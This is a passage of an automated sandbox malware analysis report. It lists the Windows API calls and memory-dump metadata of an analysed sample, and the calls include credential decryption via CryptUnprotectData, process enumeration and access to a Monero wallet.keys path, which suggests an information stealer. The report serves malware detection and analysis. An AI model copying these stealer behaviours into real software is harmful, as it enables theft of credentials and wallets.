                                • lstrcat.KERNEL32(?,00950B4E), ref: 0093C978
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: 120c87e0d7c2dddcc7759363c4c8bbed943b558c1bd3dcf671e6c8a096bcb95b
                                • Instruction ID: 5b2af78e0f2ea2abc37ab0458f36dc082f1ad018d4ce74c246c59fd123460119
                                • Opcode Fuzzy Hash: 120c87e0d7c2dddcc7759363c4c8bbed943b558c1bd3dcf671e6c8a096bcb95b
                                • Instruction Fuzzy Hash: 444172B590421ADFDB50DF90DD89BFEB7B8BB88704F1045A8F509A7280DB745A84CF92
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0093724D
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00937254
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00937281
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 009372A4
                                • LocalFree.KERNEL32(?), ref: 009372AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: 674253222fae27aeebb204c2772d1456dd32b8c132222fe058e3f97564b37465
                                • Instruction ID: 33147c00fbd003904ae1fd2f77b7a965b7fa9ef7bdca0c2a0fcf3959758a5f08
                                • Opcode Fuzzy Hash: 674253222fae27aeebb204c2772d1456dd32b8c132222fe058e3f97564b37465
                                • Instruction Fuzzy Hash: 820112B5A40308BBDB54DFD4CD46F9E77B8EB44701F104554FB09BB2C0DA70AA408B66
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0094961E
                                • Process32First.KERNEL32(00950ACA,00000128), ref: 00949632
                                • Process32Next.KERNEL32(00950ACA,00000128), ref: 00949647
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 0094965C
                                • CloseHandle.KERNEL32(00950ACA), ref: 0094967A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: e511aa49c065c0ab051ec415a15c063fd464afa51a233f0cf517a4597e3770d7
                                • Instruction ID: 47fd28335aa0f9c1f7755e50bb5227cc65701d1043fd2d67c10ea58bc0c9e2b8
                                • Opcode Fuzzy Hash: e511aa49c065c0ab051ec415a15c063fd464afa51a233f0cf517a4597e3770d7
                                • Instruction Fuzzy Hash: EE011E75A00208EBCB54DFA5CD58FEEB7F8EB48301F104188A909A7240DB349F80CF51
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: $`y$7k??$?mM$Bok
                                • API String ID: 0-677361715
                                • Opcode ID: 6087e776b55415b018ce3dd02ebf0c5e4845668a191370baf7fc355df69e5509
                                • Instruction ID: 8073fc4debfa8f370d0dd168e86aff7c39d9b87b0b1e59bc7d8d9a525fbaec70
                                • Opcode Fuzzy Hash: 6087e776b55415b018ce3dd02ebf0c5e4845668a191370baf7fc355df69e5509
                                • Instruction Fuzzy Hash: 2DB2F6F360C204AFE704AE2DEC8567AFBE9EF94720F16493DE6C5C3744EA3558018696
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 3p|;$A5{$BxML$,_?
                                • API String ID: 0-2845234193
                                • Opcode ID: 7a10e2ceaa038711be582c71a7a4d2a94e35058a168b6936c91e70a98eaa6c35
                                • Instruction ID: 50adb4a69f3904d51c03f61172ae6fae85e17c02f6401e7d9f69d6e4a3c74645
                                • Opcode Fuzzy Hash: 7a10e2ceaa038711be582c71a7a4d2a94e35058a168b6936c91e70a98eaa6c35
                                • Instruction Fuzzy Hash: 2FB2E5F360C204AFE304AE29EC8567AFBE9EF94720F16493DE6C4C3744EA3558058697
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009505B7), ref: 009486CA
                                • Process32First.KERNEL32(?,00000128), ref: 009486DE
                                • Process32Next.KERNEL32(?,00000128), ref: 009486F3
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • CloseHandle.KERNEL32(?), ref: 00948761
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: 9104d46c94413ac1d4c1d8d41cc6ccf83c48da3b0ed2212f6b78a197fed9ffdb
                                • Instruction ID: c0db3ac61baa30b64ca68c6e47b5f43ad4a5354aa8bf47803390946cb90668b5
                                • Opcode Fuzzy Hash: 9104d46c94413ac1d4c1d8d41cc6ccf83c48da3b0ed2212f6b78a197fed9ffdb
                                • Instruction Fuzzy Hash: 95316B71941218ABDB24DF51CC51FEEB778EB84704F104299F50AA22A0DF306E85CFA2
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,00935184,40000001,00000000,00000000,?,00935184), ref: 00948EC0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
                                • Opcode ID: 97601dd0a685f10225bba29038192af2bf6f371854db14ff2ee3b09f5f4dbc2b
                                • Instruction ID: b0c454eb43ae3b25a8640a229e100861a52c8778d60d643c63b9d0b6c71a4290
                                • Opcode Fuzzy Hash: 97601dd0a685f10225bba29038192af2bf6f371854db14ff2ee3b09f5f4dbc2b
                                • Instruction Fuzzy Hash: 0F111C74200204BFDB40DF64D884FAF33A9AF89700F109948F9198B250DB75EC85DB61
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00934EEE,00000000,00000000), ref: 00939AEF
                                • LocalAlloc.KERNEL32(00000040,?,?,?,00934EEE,00000000,?), ref: 00939B01
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00934EEE,00000000,00000000), ref: 00939B2A
                                • LocalFree.KERNEL32(?,?,?,?,00934EEE,00000000,?), ref: 00939B3F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: f5d03cb5e82c999d37bb1abdc8ca510c52d1e89205be04f7c72497b58ed44870
                                • Instruction ID: ada1a477b33d44e9f096b0df03390d0c71fe35856911786cf54b31b79b691ccd
                                • Opcode Fuzzy Hash: f5d03cb5e82c999d37bb1abdc8ca510c52d1e89205be04f7c72497b58ed44870
                                • Instruction Fuzzy Hash: 7611A4B4240208EFEB10CF64DC95FAAB7B9FB89700F208058F9199B390C7B5A941CB51
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00950E00,00000000,?), ref: 009479B0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009479B7
                                • GetLocalTime.KERNEL32(?,?,?,?,?,00950E00,00000000,?), ref: 009479C4
                                • wsprintfA.USER32 ref: 009479F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 83085632a9be067845b6fedfaed6945d02e0287bac3202655499e0543bd91c6c
                                • Instruction ID: b6baafa423281266dd58c911bb491aeb1bebb53e08ec9c32764e1daf1d692b32
                                • Opcode Fuzzy Hash: 83085632a9be067845b6fedfaed6945d02e0287bac3202655499e0543bd91c6c
                                • Instruction Fuzzy Hash: B31115B2904118AACB149FC9DD45BBEB7F8EB88B11F14425AF605A2280E6395940CBB1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,015BF440,00000000,?,00950E10,00000000,?,00000000,00000000), ref: 00947A63
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00947A6A
                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,015BF440,00000000,?,00950E10,00000000,?,00000000,00000000,?), ref: 00947A7D
                                • wsprintfA.USER32 ref: 00947AB7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: 8f57ae2e6f0dbd163a362fc7fecdea3db1138316b9f3a407beb6b05b16473d8c
                                • Instruction ID: 50b118da1bf3849e81e9c77c857eb64ea3b0c36f2a1756ed2730bec4c5bc88f7
                                • Opcode Fuzzy Hash: 8f57ae2e6f0dbd163a362fc7fecdea3db1138316b9f3a407beb6b05b16473d8c
                                • Instruction Fuzzy Hash: 40118EB1A45218EBEB20CB94DC49FA9B778FB44721F10479AE90A932C0DB745A80CF52
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Jg/T$iS*p$Mw
                                • API String ID: 0-261532386
                                • Opcode ID: 296b2f2d47a90bfe8ba7b3ede8b43a802f466af9994172ea593967cc0ead415e
                                • Instruction ID: 830d6f7daa26b455d358fcdb6ed1ca61f923830ef5057ce14f0443e504e585f3
                                • Opcode Fuzzy Hash: 296b2f2d47a90bfe8ba7b3ede8b43a802f466af9994172ea593967cc0ead415e
                                • Instruction Fuzzy Hash: 6172E6F360C204AFE304AE2DEC8577ABBE9EF94720F1A493DE6C4C3744E97558058696
                                APIs
                                • CoCreateInstance.COMBASE(0094E118,00000000,00000001,0094E108,00000000), ref: 00943758
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 009437B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
